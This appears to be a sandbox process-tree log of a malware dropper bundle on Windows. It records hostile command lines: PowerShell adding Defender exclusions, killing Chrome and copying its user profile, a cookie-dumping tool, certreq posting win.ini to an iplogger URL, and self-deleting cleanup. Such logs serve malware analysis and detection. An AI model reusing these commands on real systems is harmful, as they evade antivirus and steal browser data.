C:\Users\Admin\AppData\Local\Temp\yoml1tht.eal\setup.exeC:\Users\Admin\AppData\Local\Temp\yoml1tht.eal\setup.exe /8-222225⤵PID:10440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Muddy-Voice"26⤵PID:1908
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ldlbwogy.rlk\MultitimerFour.exe & exit24⤵PID:9788
-
C:\Users\Admin\AppData\Local\Temp\ldlbwogy.rlk\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\ldlbwogy.rlk\MultitimerFour.exe25⤵PID:5804
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\Delta.exe" /Verysilent18⤵PID:9364
-
C:\Users\Admin\AppData\Local\Temp\is-9J7V8.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-9J7V8.tmp\Delta.tmp" /SL5="$9062E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\Delta.exe" /Verysilent19⤵PID:3136
-
C:\Users\Admin\AppData\Local\Temp\is-RDES3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RDES3.tmp\Setup.exe" /VERYSILENT20⤵PID:9300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\zznote.exe" /Verysilent18⤵PID:4072
-
C:\Users\Admin\AppData\Local\Temp\is-VI70D.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-VI70D.tmp\zznote.tmp" /SL5="$4099C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-3D0HR.tmp\zznote.exe" /Verysilent19⤵PID:988
-
C:\Users\Admin\AppData\Local\Temp\is-MK2ME.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-MK2ME.tmp\jg4_4jaa.exe" /silent20⤵PID:6064
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\g2p03w1n0bj\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\g2p03w1n0bj\askinstall24.exe"14⤵PID:8664
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe15⤵PID:7276
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe16⤵
- Kills process with taskkill
PID:7896
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y15⤵PID:8844
-
-
-
C:\Users\Admin\AppData\Local\Temp\3zkhl5uablw\fjhoyqe4p3y.exe"C:\Users\Admin\AppData\Local\Temp\3zkhl5uablw\fjhoyqe4p3y.exe" /ustwo INSTALL14⤵PID:4820
-
-
C:\Users\Admin\AppData\Local\Temp\zsh42ijjbv0\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\zsh42ijjbv0\chashepro3.exe" /VERYSILENT14⤵PID:6576
-
C:\Users\Admin\AppData\Local\Temp\is-JDJVL.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-JDJVL.tmp\chashepro3.tmp" /SL5="$10868,2015144,58368,C:\Users\Admin\AppData\Local\Temp\zsh42ijjbv0\chashepro3.exe" /VERYSILENT15⤵PID:7132
-
-
-
C:\Users\Admin\AppData\Local\Temp\axr01mh3d5q\vict.exe"C:\Users\Admin\AppData\Local\Temp\axr01mh3d5q\vict.exe" /VERYSILENT /id=53514⤵PID:5604
-
C:\Users\Admin\AppData\Local\Temp\is-JQJNO.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-JQJNO.tmp\vict.tmp" /SL5="$506FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\axr01mh3d5q\vict.exe" /VERYSILENT /id=53515⤵PID:6312
-
C:\Users\Admin\AppData\Local\Temp\is-DQN7V.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-DQN7V.tmp\wimapi.exe" 53516⤵PID:4304
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zqfbycxocdf\app.exe"C:\Users\Admin\AppData\Local\Temp\zqfbycxocdf\app.exe" /8-2314⤵PID:6580
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Silent-Frog"15⤵PID:10396
-
-
C:\Program Files (x86)\Silent-Frog\7za.exe"C:\Program Files (x86)\Silent-Frog\7za.exe" e -p154.61.71.51 winamp-plugins.7z15⤵PID:6156
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Silent-Frog\app.exe" -map "C:\Program Files (x86)\Silent-Frog\WinmonProcessMonitor.sys""15⤵PID:5676
-
C:\Program Files (x86)\Silent-Frog\app.exe"C:\Program Files (x86)\Silent-Frog\app.exe" -map "C:\Program Files (x86)\Silent-Frog\WinmonProcessMonitor.sys"16⤵PID:7164
-
-
-
C:\Program Files (x86)\Silent-Frog\7za.exe"C:\Program Files (x86)\Silent-Frog\7za.exe" e -p154.61.71.51 winamp.7z15⤵PID:8460
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\Delta.exe" /Verysilent3⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\is-3Q10A.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-3Q10A.tmp\Delta.tmp" /SL5="$40510,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\Delta.exe" /Verysilent4⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\is-PVJU7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PVJU7.tmp\Setup.exe" /VERYSILENT5⤵PID:7056
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-PVJU7.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit6⤵PID:6292
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f7⤵
- Kills process with taskkill
PID:6896
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:10608
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\zznote.exe" /Verysilent3⤵PID:10144
-
C:\Users\Admin\AppData\Local\Temp\is-3OKQ0.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-3OKQ0.tmp\zznote.tmp" /SL5="$60510,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\zznote.exe" /Verysilent4⤵PID:10228
-
C:\Users\Admin\AppData\Local\Temp\is-7M1R6.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-7M1R6.tmp\jg4_4jaa.exe" /silent5⤵PID:10692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\hjjgaa.exe" /Verysilent3⤵PID:11252
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6220
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7436
-
-
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"1⤵
- Executes dropped EXE
PID:4560 -
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"2⤵PID:6020
-
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"1⤵
- Executes dropped EXE
PID:4512
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"1⤵PID:4440
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"1⤵PID:4408
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\is-J6SF3.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-J6SF3.tmp\IBInstaller_97039.tmp" /SL5="$10254,14452723,721408,C:\Users\Admin\AppData\Local\Temp\vy2pekqus0p\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4164
-
C:\Users\Admin\AppData\Local\Temp\is-40HDN.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-40HDN.tmp\vict.tmp" /SL5="$10248,870426,780800,C:\Users\Admin\AppData\Local\Temp\zcr5kiudwbu\vict.exe" /VERYSILENT /id=5351⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4124
-
C:\Users\Admin\AppData\Local\Temp\is-NB915.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-NB915.tmp\chashepro3.tmp" /SL5="$1024A,2015144,58368,C:\Users\Admin\AppData\Local\Temp\4iz1gdqs2nv\chashepro3.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4104
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5500
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5616
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7208
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6b6361fa-8458-0940-82b6-21783b6c8c50}\oemvista.inf" "9" "4d14a44ff" "0000000000000188" "WinSta0\Default" "000000000000018C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7300
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000188"2⤵PID:7532
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7572
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7588
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:10352
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6560
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7260
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8284
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6132
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:5184
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9064
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\A2BA.tmp.exeC:\Users\Admin\AppData\Local\Temp\A2BA.tmp.exe1⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\CA77.tmp.exeC:\Users\Admin\AppData\Local\Temp\CA77.tmp.exe1⤵PID:4132
-
C:\Users\Admin\AppData\Local\Temp\CA77.tmp.exeC:\Users\Admin\AppData\Local\Temp\CA77.tmp.exe2⤵PID:8308
-
-
C:\Users\Admin\AppData\Local\Temp\DFE5.tmp.exeC:\Users\Admin\AppData\Local\Temp\DFE5.tmp.exe1⤵PID:10524
-
C:\Users\Admin\AppData\Local\Temp\DFE5.tmp.exe"{path}"2⤵PID:7872
-
-
C:\Users\Admin\AppData\Local\Temp\1463.tmp.exeC:\Users\Admin\AppData\Local\Temp\1463.tmp.exe1⤵PID:8340
-
C:\Users\Admin\AppData\Local\Temp\1F61.tmp.exeC:\Users\Admin\AppData\Local\Temp\1F61.tmp.exe1⤵PID:10636
-
C:\Users\Admin\AppData\Local\Temp\42D8.tmp.exeC:\Users\Admin\AppData\Local\Temp\42D8.tmp.exe1⤵PID:7648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵PID:8656
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:6100
-
-
-
C:\Users\Admin\AppData\Local\Temp\42D8.tmp.exe"C:\Users\Admin\AppData\Local\Temp\42D8.tmp.exe"2⤵PID:9740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 24242⤵
- Program crash
PID:8148
-
-
C:\Users\Admin\AppData\Local\Temp\5AF5.tmp.exeC:\Users\Admin\AppData\Local\Temp\5AF5.tmp.exe1⤵PID:8880
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7344
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7476
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7960
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6912
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4928
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4444
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9596
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9484
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6868
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:5928
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:9588
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:6608
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:10096
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8240
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7740
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2068
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\is-UA248.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UA248.tmp\Setup3310.tmp" /SL5="$7086C,802346,56832,C:\Users\Admin\AppData\Local\Temp\ksi4fg2ycxs\Setup3310.exe" /Verysilent /subid=5771⤵PID:7260
-
C:\Users\Admin\AppData\Local\Temp\is-KG1Q2.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KG1Q2.tmp\Setup.exe" /Verysilent2⤵PID:5168
-
C:\Users\Admin\AppData\Local\Temp\is-P7BUL.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-P7BUL.tmp\Setup.tmp" /SL5="$20A20,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-KG1Q2.tmp\Setup.exe" /Verysilent3⤵PID:9464
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CKE7R.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-CKE7R.tmp\chashepro3.tmp" /SL5="$5083E,2015144,58368,C:\Users\Admin\AppData\Local\Temp\of3dxkhuuwr\chashepro3.exe" /VERYSILENT1⤵PID:6764
-
C:\Users\Admin\AppData\Local\Temp\WTBNL9S9LU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WTBNL9S9LU\multitimer.exe" 2 3.1615015133.60432cddbc1311⤵PID:6568
-
C:\Users\Admin\AppData\Local\Temp\443mnt2cwfd\vict.exe"C:\Users\Admin\AppData\Local\Temp\443mnt2cwfd\vict.exe" /VERYSILENT /id=5352⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\is-QMT2A.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-QMT2A.tmp\vict.tmp" /SL5="$60708,870426,780800,C:\Users\Admin\AppData\Local\Temp\443mnt2cwfd\vict.exe" /VERYSILENT /id=5353⤵PID:10420
-
C:\Users\Admin\AppData\Local\Temp\is-RBJ1B.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-RBJ1B.tmp\wimapi.exe" 5354⤵PID:8180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\agzgc32mnqf\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\agzgc32mnqf\Setup3310.exe" /Verysilent /subid=5772⤵PID:10764
-
C:\Users\Admin\AppData\Local\Temp\is-G0D70.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-G0D70.tmp\Setup3310.tmp" /SL5="$20862,802346,56832,C:\Users\Admin\AppData\Local\Temp\agzgc32mnqf\Setup3310.exe" /Verysilent /subid=5773⤵PID:10680
-
-
-
C:\Users\Admin\AppData\Local\Temp\md4kavnfttq\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\md4kavnfttq\chashepro3.exe" /VERYSILENT2⤵PID:8824
-
C:\Users\Admin\AppData\Local\Temp\is-UAPAJ.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-UAPAJ.tmp\chashepro3.tmp" /SL5="$20864,2015144,58368,C:\Users\Admin\AppData\Local\Temp\md4kavnfttq\chashepro3.exe" /VERYSILENT3⤵PID:10540
-
-
-
C:\Users\Admin\AppData\Local\Temp\swz1t54efwc\d513tvy3vnd.exe"C:\Users\Admin\AppData\Local\Temp\swz1t54efwc\d513tvy3vnd.exe" /ustwo INSTALL2⤵PID:9512
-
-
C:\Users\Admin\AppData\Local\Temp\vprxuxfbh1y\safebits.exe"C:\Users\Admin\AppData\Local\Temp\vprxuxfbh1y\safebits.exe" /S /pubid=1 /subid=4512⤵PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\c4hmqljpohn\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\c4hmqljpohn\askinstall24.exe"2⤵PID:8216
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:4776
-
-
-
C:\Users\Admin\AppData\Local\Temp\kifx4htiajk\app.exe"C:\Users\Admin\AppData\Local\Temp\kifx4htiajk\app.exe" /8-232⤵PID:712
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Morning-Rain"3⤵PID:2300
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8904
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7608
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:7160